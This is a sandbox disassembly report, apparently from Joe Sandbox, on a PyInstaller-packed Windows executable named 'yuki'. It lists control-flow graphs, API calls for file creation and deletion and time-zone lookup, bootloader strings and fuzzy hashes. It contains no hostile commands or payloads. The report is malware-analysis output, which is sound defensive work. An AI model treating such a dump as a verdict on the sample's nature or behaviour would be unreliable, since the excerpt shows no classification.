                                                                                                      control_flow_graph 62 7ff6c81f1000-7ff6c81f3806 call 7ff6c81ffe18 call 7ff6c81ffe20 call 7ff6c81fc850 call 7ff6c82053f0 call 7ff6c8205484 call 7ff6c81f36b0 76 7ff6c81f3814-7ff6c81f3836 call 7ff6c81f1950 62->76 77 7ff6c81f3808-7ff6c81f380f 62->77 83 7ff6c81f383c-7ff6c81f3856 call 7ff6c81f1c80 76->83 84 7ff6c81f391b-7ff6c81f3931 call 7ff6c81f45c0 76->84 78 7ff6c81f3c97-7ff6c81f3cb2 call 7ff6c81fc550 77->78 87 7ff6c81f385b-7ff6c81f389b call 7ff6c81f8830 83->87 90 7ff6c81f3933-7ff6c81f3960 call 7ff6c81f7f90 84->90 91 7ff6c81f396a-7ff6c81f397f call 7ff6c81f2710 84->91 96 7ff6c81f38c1-7ff6c81f38cc call 7ff6c8204f30 87->96 97 7ff6c81f389d-7ff6c81f38a3 87->97 103 7ff6c81f3984-7ff6c81f39a6 call 7ff6c81f1c80 90->103 104 7ff6c81f3962-7ff6c81f3965 call 7ff6c820004c 90->104 99 7ff6c81f3c8f 91->99 111 7ff6c81f38d2-7ff6c81f38e1 call 7ff6c81f8830 96->111 112 7ff6c81f39fc-7ff6c81f3a2a call 7ff6c81f8940 call 7ff6c81f89a0 * 3 96->112 100 7ff6c81f38a5-7ff6c81f38ad 97->100 101 7ff6c81f38af-7ff6c81f38bd call 7ff6c81f89a0 97->101 99->78 100->101 101->96 113 7ff6c81f39b0-7ff6c81f39b9 103->113 104->91 121 7ff6c81f39f4-7ff6c81f39f7 call 7ff6c8204f30 111->121 122 7ff6c81f38e7-7ff6c81f38ed 111->122 138 7ff6c81f3a2f-7ff6c81f3a3e call 7ff6c81f8830 112->138 113->113 116 7ff6c81f39bb-7ff6c81f39d8 call 7ff6c81f1950 113->116 116->87 130 7ff6c81f39de-7ff6c81f39ef call 7ff6c81f2710 116->130 121->112 123 7ff6c81f38f0-7ff6c81f38fc 122->123 127 7ff6c81f3905-7ff6c81f3908 123->127 128 7ff6c81f38fe-7ff6c81f3903 123->128 127->121 131 7ff6c81f390e-7ff6c81f3916 call 7ff6c8204f30 127->131 128->123 128->127 130->99 131->138 141 7ff6c81f3a44-7ff6c81f3a47 138->141 142 7ff6c81f3b45-7ff6c81f3b53 138->142 141->142 145 7ff6c81f3a4d-7ff6c81f3a50 141->145 143 7ff6c81f3b59-7ff6c81f3b5d 142->143 144 7ff6c81f3a67 142->144 146 7ff6c81f3a6b-7ff6c81f3a90 call 7ff6c8204f30 143->146 144->146 147 7ff6c81f3b14-7ff6c81f3b17 145->147 148 7ff6c81f3a56-7ff6c81f3a5a 145->148 157 7ff6c81f3a92-7ff6c81f3aa6 call 7ff6c81f8940 146->157 158 7ff6c81f3aab-7ff6c81f3ac0 146->158 150 7ff6c81f3b2f-7ff6c81f3b40 call 7ff6c81f2710 147->150 151 7ff6c81f3b19-7ff6c81f3b1d 147->151 148->147 149 7ff6c81f3a60 148->149 149->144 159 7ff6c81f3c7f-7ff6c81f3c87 150->159 151->150 153 7ff6c81f3b1f-7ff6c81f3b2a 151->153 153->146 157->158 161 7ff6c81f3be8-7ff6c81f3bfa call 7ff6c81f8830 158->161 162 7ff6c81f3ac6-7ff6c81f3aca 158->162 159->99 170 7ff6c81f3c2e 161->170 171 7ff6c81f3bfc-7ff6c81f3c02 161->171 164 7ff6c81f3ad0-7ff6c81f3ae8 call 7ff6c8205250 162->164 165 7ff6c81f3bcd-7ff6c81f3be2 call 7ff6c81f1940 162->165 175 7ff6c81f3b62-7ff6c81f3b7a call 7ff6c8205250 164->175 176 7ff6c81f3aea-7ff6c81f3b02 call 7ff6c8205250 164->176 165->161 165->162 177 7ff6c81f3c31-7ff6c81f3c40 call 7ff6c8204f30 170->177 173 7ff6c81f3c04-7ff6c81f3c1c 171->173 174 7ff6c81f3c1e-7ff6c81f3c2c 171->174 173->177 174->177 184 7ff6c81f3b7c-7ff6c81f3b80 175->184 185 7ff6c81f3b87-7ff6c81f3b9f call 7ff6c8205250 175->185 176->165 186 7ff6c81f3b08-7ff6c81f3b0f 176->186 187 7ff6c81f3d41-7ff6c81f3d63 call 7ff6c81f44e0 177->187 188 7ff6c81f3c46-7ff6c81f3c4a 177->188 184->185 200 7ff6c81f3ba1-7ff6c81f3ba5 185->200 201 7ff6c81f3bac-7ff6c81f3bc4 call 7ff6c8205250 185->201 186->165 198 7ff6c81f3d65-7ff6c81f3d6f call 7ff6c81f4630 187->198 199 7ff6c81f3d71-7ff6c81f3d82 call 7ff6c81f1c80 187->199 190 7ff6c81f3cd4-7ff6c81f3ce6 call 7ff6c81f8830 188->190 191 7ff6c81f3c50-7ff6c81f3c5f call 7ff6c81f90e0 188->191 205 7ff6c81f3d35-7ff6c81f3d3c 190->205 206 7ff6c81f3ce8-7ff6c81f3ceb 190->206 203 7ff6c81f3cb3-7ff6c81f3cb6 call 7ff6c81f8660 191->203 204 7ff6c81f3c61 191->204 213 7ff6c81f3d87-7ff6c81f3d96 198->213 199->213 200->201 201->165 221 7ff6c81f3bc6 201->221 220 7ff6c81f3cbb-7ff6c81f3cbd 203->220 210 7ff6c81f3c68 call 7ff6c81f2710 204->210 205->210 206->205 211 7ff6c81f3ced-7ff6c81f3d10 call 7ff6c81f1c80 206->211 222 7ff6c81f3c6d-7ff6c81f3c77 210->222 228 7ff6c81f3d12-7ff6c81f3d26 call 7ff6c81f2710 call 7ff6c8204f30 211->228 229 7ff6c81f3d2b-7ff6c81f3d33 call 7ff6c8204f30 211->229 218 7ff6c81f3dc4-7ff6c81f3dda call 7ff6c81f9390 213->218 219 7ff6c81f3d98-7ff6c81f3d9f 213->219 234 7ff6c81f3ddc 218->234 235 7ff6c81f3de8-7ff6c81f3e04 SetDllDirectoryW 218->235 219->218 224 7ff6c81f3da1-7ff6c81f3da5 219->224 226 7ff6c81f3cbf-7ff6c81f3cc6 220->226 227 7ff6c81f3cc8-7ff6c81f3ccf 220->227 221->165 222->159 224->218 230 7ff6c81f3da7-7ff6c81f3dbe SetDllDirectoryW LoadLibraryExW 224->230 226->210 227->213 228->222 229->213 230->218 234->235 236 7ff6c81f3f01-7ff6c81f3f08 235->236 237 7ff6c81f3e0a-7ff6c81f3e19 call 7ff6c81f8830 235->237 242 7ff6c81f3f0e-7ff6c81f3f15 236->242 243 7ff6c81f4008-7ff6c81f4010 236->243 250 7ff6c81f3e32-7ff6c81f3e3c call 7ff6c8204f30 237->250 251 7ff6c81f3e1b-7ff6c81f3e21 237->251 242->243 246 7ff6c81f3f1b-7ff6c81f3f25 call 7ff6c81f33c0 242->246 247 7ff6c81f4035-7ff6c81f4067 call 7ff6c81f36a0 call 7ff6c81f3360 call 7ff6c81f3670 call 7ff6c81f6fc0 call 7ff6c81f6d70 243->247 248 7ff6c81f4012-7ff6c81f402f PostMessageW GetMessageW 243->248 246->222 260 7ff6c81f3f2b-7ff6c81f3f3f call 7ff6c81f90c0 246->260 248->247 263 7ff6c81f3ef2-7ff6c81f3efc call 7ff6c81f8940 250->263 264 7ff6c81f3e42-7ff6c81f3e48 250->264 254 7ff6c81f3e23-7ff6c81f3e2b 251->254 255 7ff6c81f3e2d-7ff6c81f3e2f 251->255 254->255 255->250 269 7ff6c81f3f64-7ff6c81f3fa7 call 7ff6c81f8940 call 7ff6c81f89e0 call 7ff6c81f6fc0 call 7ff6c81f6d70 call 7ff6c81f88e0 260->269 270 7ff6c81f3f41-7ff6c81f3f5e PostMessageW GetMessageW 260->270 263->236 264->263 268 7ff6c81f3e4e-7ff6c81f3e54 264->268 272 7ff6c81f3e5f-7ff6c81f3e61 268->272 273 7ff6c81f3e56-7ff6c81f3e58 268->273 311 7ff6c81f3ff5-7ff6c81f3ffc call 7ff6c81f1900 269->311 312 7ff6c81f3fa9-7ff6c81f3fbf call 7ff6c81f8ed0 call 7ff6c81f88e0 269->312 270->269 272->236 277 7ff6c81f3e67-7ff6c81f3e83 call 7ff6c81f6dc0 call 7ff6c81f7340 272->277 276 7ff6c81f3e5a 273->276 273->277 276->236 289 7ff6c81f3e85-7ff6c81f3e8c 277->289 290 7ff6c81f3e8e-7ff6c81f3e95 277->290 292 7ff6c81f3edb-7ff6c81f3ef0 call 7ff6c81f2a50 call 7ff6c81f6fc0 call 7ff6c81f6d70 289->292 293 7ff6c81f3eaf-7ff6c81f3eb9 call 7ff6c81f71b0 290->293 294 7ff6c81f3e97-7ff6c81f3ea4 call 7ff6c81f6e00 290->294 292->236 306 7ff6c81f3ec4-7ff6c81f3ed2 call 7ff6c81f74f0 293->306 307 7ff6c81f3ebb-7ff6c81f3ec2 293->307 294->293 305 7ff6c81f3ea6-7ff6c81f3ead 294->305 305->292 306->236 317 7ff6c81f3ed4 306->317 307->292 320 7ff6c81f4001-7ff6c81f4003 311->320 312->311 323 7ff6c81f3fc1-7ff6c81f3fd6 312->323 317->292 320->222 324 7ff6c81f3ff0 call 7ff6c81f2a50 323->324 325 7ff6c81f3fd8-7ff6c81f3feb call 7ff6c81f2710 call 7ff6c81f1900 323->325 324->311 325->222
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                      • API String ID: 2776309574-3273434969
                                                                                                      • Opcode ID: 1ea4fcc713fd005afa0efdd28e0080ab400e11cc2299466f724eb3bf08c1015a
                                                                                                      • Instruction ID: 4df5cc88e09d03a77902d3fa77c5886d66ba0ec33aa838dd38fe89de4d1f84d4
                                                                                                      • Opcode Fuzzy Hash: 1ea4fcc713fd005afa0efdd28e0080ab400e11cc2299466f724eb3bf08c1015a
                                                                                                      • Instruction Fuzzy Hash: 1D328B31A0C68391FA35DF3595582B962E1AF64B82F844032DACDC3AD6EF3DE559C348

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 479 7ff6c8215c00-7ff6c8215c3b call 7ff6c8215588 call 7ff6c8215590 call 7ff6c82155f8 486 7ff6c8215c41-7ff6c8215c4c call 7ff6c8215598 479->486 487 7ff6c8215e65-7ff6c8215eb1 call 7ff6c820a900 call 7ff6c8215588 call 7ff6c8215590 call 7ff6c82155f8 479->487 486->487 493 7ff6c8215c52-7ff6c8215c5c 486->493 513 7ff6c8215eb7-7ff6c8215ec2 call 7ff6c8215598 487->513 514 7ff6c8215fef-7ff6c821605d call 7ff6c820a900 call 7ff6c8211578 487->514 495 7ff6c8215c7e-7ff6c8215c82 493->495 496 7ff6c8215c5e-7ff6c8215c61 493->496 498 7ff6c8215c85-7ff6c8215c8d 495->498 497 7ff6c8215c64-7ff6c8215c6f 496->497 500 7ff6c8215c7a-7ff6c8215c7c 497->500 501 7ff6c8215c71-7ff6c8215c78 497->501 498->498 502 7ff6c8215c8f-7ff6c8215ca2 call 7ff6c820d5fc 498->502 500->495 504 7ff6c8215cab-7ff6c8215cb9 500->504 501->497 501->500 509 7ff6c8215cba-7ff6c8215cc6 call 7ff6c820a948 502->509 510 7ff6c8215ca4-7ff6c8215ca6 call 7ff6c820a948 502->510 521 7ff6c8215ccd-7ff6c8215cd5 509->521 510->504 513->514 523 7ff6c8215ec8-7ff6c8215ed3 call 7ff6c82155c8 513->523 533 7ff6c821606b-7ff6c821606e 514->533 534 7ff6c821605f-7ff6c8216066 514->534 521->521 524 7ff6c8215cd7-7ff6c8215ce8 call 7ff6c8210474 521->524 523->514 531 7ff6c8215ed9-7ff6c8215efc call 7ff6c820a948 GetTimeZoneInformation 523->531 524->487 532 7ff6c8215cee-7ff6c8215d44 call 7ff6c821a4d0 * 4 call 7ff6c8215b1c 524->532 545 7ff6c8215f02-7ff6c8215f23 531->545 546 7ff6c8215fc4-7ff6c8215fee call 7ff6c8215580 call 7ff6c8215570 call 7ff6c8215578 531->546 591 7ff6c8215d46-7ff6c8215d4a 532->591 538 7ff6c8216070 533->538 539 7ff6c82160a5-7ff6c82160b8 call 7ff6c820d5fc 533->539 537 7ff6c82160fb-7ff6c82160fe 534->537 542 7ff6c8216073 537->542 543 7ff6c8216104-7ff6c821610c call 7ff6c8215c00 537->543 538->542 558 7ff6c82160ba 539->558 559 7ff6c82160c3-7ff6c82160de call 7ff6c8211578 539->559 548 7ff6c8216078-7ff6c82160a4 call 7ff6c820a948 call 7ff6c81fc550 542->548 549 7ff6c8216073 call 7ff6c8215e7c 542->549 543->548 552 7ff6c8215f2e-7ff6c8215f35 545->552 553 7ff6c8215f25-7ff6c8215f2b 545->553 549->548 562 7ff6c8215f37-7ff6c8215f3f 552->562 563 7ff6c8215f49 552->563 553->552 560 7ff6c82160bc-7ff6c82160c1 call 7ff6c820a948 558->560 575 7ff6c82160e0-7ff6c82160e3 559->575 576 7ff6c82160e5-7ff6c82160f7 call 7ff6c820a948 559->576 560->538 562->563 569 7ff6c8215f41-7ff6c8215f47 562->569 572 7ff6c8215f4b-7ff6c8215fbf call 7ff6c821a4d0 * 4 call 7ff6c8212b5c call 7ff6c8216114 * 2 563->572 569->572 572->546 575->560 576->537 593 7ff6c8215d4c 591->593 594 7ff6c8215d50-7ff6c8215d54 591->594 593->594 594->591 596 7ff6c8215d56-7ff6c8215d7b call 7ff6c8206b58 594->596 602 7ff6c8215d7e-7ff6c8215d82 596->602 604 7ff6c8215d91-7ff6c8215d95 602->604 605 7ff6c8215d84-7ff6c8215d8f 602->605 604->602 605->604 607 7ff6c8215d97-7ff6c8215d9b 605->607 610 7ff6c8215e1c-7ff6c8215e20 607->610 611 7ff6c8215d9d-7ff6c8215dc5 call 7ff6c8206b58 607->611 612 7ff6c8215e27-7ff6c8215e34 610->612 613 7ff6c8215e22-7ff6c8215e24 610->613 619 7ff6c8215dc7 611->619 620 7ff6c8215de3-7ff6c8215de7 611->620 615 7ff6c8215e36-7ff6c8215e4c call 7ff6c8215b1c 612->615 616 7ff6c8215e4f-7ff6c8215e5e call 7ff6c8215580 call 7ff6c8215570 612->616 613->612 615->616 616->487 623 7ff6c8215dca-7ff6c8215dd1 619->623 620->610 625 7ff6c8215de9-7ff6c8215e07 call 7ff6c8206b58 620->625 623->620 626 7ff6c8215dd3-7ff6c8215de1 623->626 631 7ff6c8215e13-7ff6c8215e1a 625->631 626->620 626->623 631->610 632 7ff6c8215e09-7ff6c8215e0d 631->632 632->610 633 7ff6c8215e0f 632->633 633->631
                                                                                                      APIs
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6C8215C45
                                                                                                        • Part of subcall function 00007FF6C8215598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C82155AC
                                                                                                        • Part of subcall function 00007FF6C820A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6C8212D22,?,?,?,00007FF6C8212D5F,?,?,00000000,00007FF6C8213225,?,?,?,00007FF6C8213157), ref: 00007FF6C820A95E
                                                                                                        • Part of subcall function 00007FF6C820A948: GetLastError.KERNEL32(?,?,?,00007FF6C8212D22,?,?,?,00007FF6C8212D5F,?,?,00000000,00007FF6C8213225,?,?,?,00007FF6C8213157), ref: 00007FF6C820A968
                                                                                                        • Part of subcall function 00007FF6C820A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6C820A8DF,?,?,?,?,?,00007FF6C820A7CA), ref: 00007FF6C820A909
                                                                                                        • Part of subcall function 00007FF6C820A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6C820A8DF,?,?,?,?,?,00007FF6C820A7CA), ref: 00007FF6C820A92E
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6C8215C34
                                                                                                        • Part of subcall function 00007FF6C82155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C821560C
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6C8215EAA
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6C8215EBB
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6C8215ECC
                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6C821610C), ref: 00007FF6C8215EF3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                      • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                      • API String ID: 4070488512-239921721
                                                                                                      • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                      • Instruction ID: 56e2490d8105fe45923f9600fa06e4b4bdf9168aab380a4f329ea8a80e53e3be
                                                                                                      • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                      • Instruction Fuzzy Hash: 48D1E222B0824246E7309F31D7995B96361FF84796FA09136EA8DC7695DF3EEC4183C8

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 693 7ff6c8216964-7ff6c82169d7 call 7ff6c8216698 696 7ff6c82169d9-7ff6c82169e2 call 7ff6c8204ee8 693->696 697 7ff6c82169f1-7ff6c82169fb call 7ff6c8208520 693->697 702 7ff6c82169e5-7ff6c82169ec call 7ff6c8204f08 696->702 703 7ff6c8216a16-7ff6c8216a7f CreateFileW 697->703 704 7ff6c82169fd-7ff6c8216a14 call 7ff6c8204ee8 call 7ff6c8204f08 697->704 717 7ff6c8216d32-7ff6c8216d52 702->717 707 7ff6c8216afc-7ff6c8216b07 GetFileType 703->707 708 7ff6c8216a81-7ff6c8216a87 703->708 704->702 710 7ff6c8216b09-7ff6c8216b44 GetLastError call 7ff6c8204e7c CloseHandle 707->710 711 7ff6c8216b5a-7ff6c8216b61 707->711 713 7ff6c8216ac9-7ff6c8216af7 GetLastError call 7ff6c8204e7c 708->713 714 7ff6c8216a89-7ff6c8216a8d 708->714 710->702 728 7ff6c8216b4a-7ff6c8216b55 call 7ff6c8204f08 710->728 720 7ff6c8216b69-7ff6c8216b6c 711->720 721 7ff6c8216b63-7ff6c8216b67 711->721 713->702 714->713 715 7ff6c8216a8f-7ff6c8216ac7 CreateFileW 714->715 715->707 715->713 725 7ff6c8216b72-7ff6c8216bc7 call 7ff6c8208438 720->725 726 7ff6c8216b6e 720->726 721->725 731 7ff6c8216be6-7ff6c8216c17 call 7ff6c8216418 725->731 732 7ff6c8216bc9-7ff6c8216bd5 call 7ff6c82168a0 725->732 726->725 728->702 739 7ff6c8216c19-7ff6c8216c1b 731->739 740 7ff6c8216c1d-7ff6c8216c5f 731->740 732->731 738 7ff6c8216bd7 732->738 741 7ff6c8216bd9-7ff6c8216be1 call 7ff6c820aac0 738->741 739->741 742 7ff6c8216c81-7ff6c8216c8c 740->742 743 7ff6c8216c61-7ff6c8216c65 740->743 741->717 744 7ff6c8216d30 742->744 745 7ff6c8216c92-7ff6c8216c96 742->745 743->742 747 7ff6c8216c67-7ff6c8216c7c 743->747 744->717 745->744 748 7ff6c8216c9c-7ff6c8216ce1 CloseHandle CreateFileW 745->748 747->742 750 7ff6c8216d16-7ff6c8216d2b 748->750 751 7ff6c8216ce3-7ff6c8216d11 GetLastError call 7ff6c8204e7c call 7ff6c8208660 748->751 750->744 751->750
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617910340-0
                                                                                                      • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                      • Instruction ID: 52cc9cf155ed878167a01349d8372dde6bd1a7339dcdc94a4fc23994e3b40cde
                                                                                                      • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                      • Instruction Fuzzy Hash: 9AC1DF32B28A4186EB20CFB4C6986AD3761E749B99B214235DE9E973D4CF3DD851C384

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,00007FF6C81F8919,00007FF6C81F3FA5), ref: 00007FF6C81F842B
                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF6C81F8919,00007FF6C81F3FA5), ref: 00007FF6C81F84AE
                                                                                                      • DeleteFileW.KERNELBASE(?,00007FF6C81F8919,00007FF6C81F3FA5), ref: 00007FF6C81F84CD
                                                                                                      • FindNextFileW.KERNELBASE(?,00007FF6C81F8919,00007FF6C81F3FA5), ref: 00007FF6C81F84DB
                                                                                                      • FindClose.KERNEL32(?,00007FF6C81F8919,00007FF6C81F3FA5), ref: 00007FF6C81F84EC
                                                                                                      • RemoveDirectoryW.KERNELBASE(?,00007FF6C81F8919,00007FF6C81F3FA5), ref: 00007FF6C81F84F5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                      • String ID: %s\*
                                                                                                      • API String ID: 1057558799-766152087
                                                                                                      • Opcode ID: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                      • Instruction ID: fe31f7df8634a5d8e2a3d93239c846bd03c22ce43158db4bb3835d9eabf3f233
                                                                                                      • Opcode Fuzzy Hash: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                      • Instruction Fuzzy Hash: 5E413231A0C95395EE309F74E4582BA63E0FBA4B56F540232D9DDC2A94DF3CD946C744

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1014 7ff6c8215e7c-7ff6c8215eb1 call 7ff6c8215588 call 7ff6c8215590 call 7ff6c82155f8 1021 7ff6c8215eb7-7ff6c8215ec2 call 7ff6c8215598 1014->1021 1022 7ff6c8215fef-7ff6c821605d call 7ff6c820a900 call 7ff6c8211578 1014->1022 1021->1022 1028 7ff6c8215ec8-7ff6c8215ed3 call 7ff6c82155c8 1021->1028 1034 7ff6c821606b-7ff6c821606e 1022->1034 1035 7ff6c821605f-7ff6c8216066 1022->1035 1028->1022 1033 7ff6c8215ed9-7ff6c8215efc call 7ff6c820a948 GetTimeZoneInformation 1028->1033 1044 7ff6c8215f02-7ff6c8215f23 1033->1044 1045 7ff6c8215fc4-7ff6c8215fee call 7ff6c8215580 call 7ff6c8215570 call 7ff6c8215578 1033->1045 1038 7ff6c8216070 1034->1038 1039 7ff6c82160a5-7ff6c82160b8 call 7ff6c820d5fc 1034->1039 1037 7ff6c82160fb-7ff6c82160fe 1035->1037 1041 7ff6c8216073 1037->1041 1042 7ff6c8216104-7ff6c821610c call 7ff6c8215c00 1037->1042 1038->1041 1055 7ff6c82160ba 1039->1055 1056 7ff6c82160c3-7ff6c82160de call 7ff6c8211578 1039->1056 1046 7ff6c8216078-7ff6c82160a4 call 7ff6c820a948 call 7ff6c81fc550 1041->1046 1047 7ff6c8216073 call 7ff6c8215e7c 1041->1047 1042->1046 1050 7ff6c8215f2e-7ff6c8215f35 1044->1050 1051 7ff6c8215f25-7ff6c8215f2b 1044->1051 1047->1046 1059 7ff6c8215f37-7ff6c8215f3f 1050->1059 1060 7ff6c8215f49 1050->1060 1051->1050 1057 7ff6c82160bc-7ff6c82160c1 call 7ff6c820a948 1055->1057 1070 7ff6c82160e0-7ff6c82160e3 1056->1070 1071 7ff6c82160e5-7ff6c82160f7 call 7ff6c820a948 1056->1071 1057->1038 1059->1060 1065 7ff6c8215f41-7ff6c8215f47 1059->1065 1067 7ff6c8215f4b-7ff6c8215fbf call 7ff6c821a4d0 * 4 call 7ff6c8212b5c call 7ff6c8216114 * 2 1060->1067 1065->1067 1067->1045 1070->1057 1071->1037
                                                                                                      APIs
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6C8215EAA
                                                                                                        • Part of subcall function 00007FF6C82155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C821560C
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6C8215EBB
                                                                                                        • Part of subcall function 00007FF6C8215598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C82155AC
                                                                                                      • _get_daylight.LIBCMT ref: 00007FF6C8215ECC
                                                                                                        • Part of subcall function 00007FF6C82155C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C82155DC
                                                                                                        • Part of subcall function 00007FF6C820A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6C8212D22,?,?,?,00007FF6C8212D5F,?,?,00000000,00007FF6C8213225,?,?,?,00007FF6C8213157), ref: 00007FF6C820A95E
                                                                                                        • Part of subcall function 00007FF6C820A948: GetLastError.KERNEL32(?,?,?,00007FF6C8212D22,?,?,?,00007FF6C8212D5F,?,?,00000000,00007FF6C8213225,?,?,?,00007FF6C8213157), ref: 00007FF6C820A968
                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6C821610C), ref: 00007FF6C8215EF3
                                                                                                      Strings
                                                                                                      Memory Dump Source
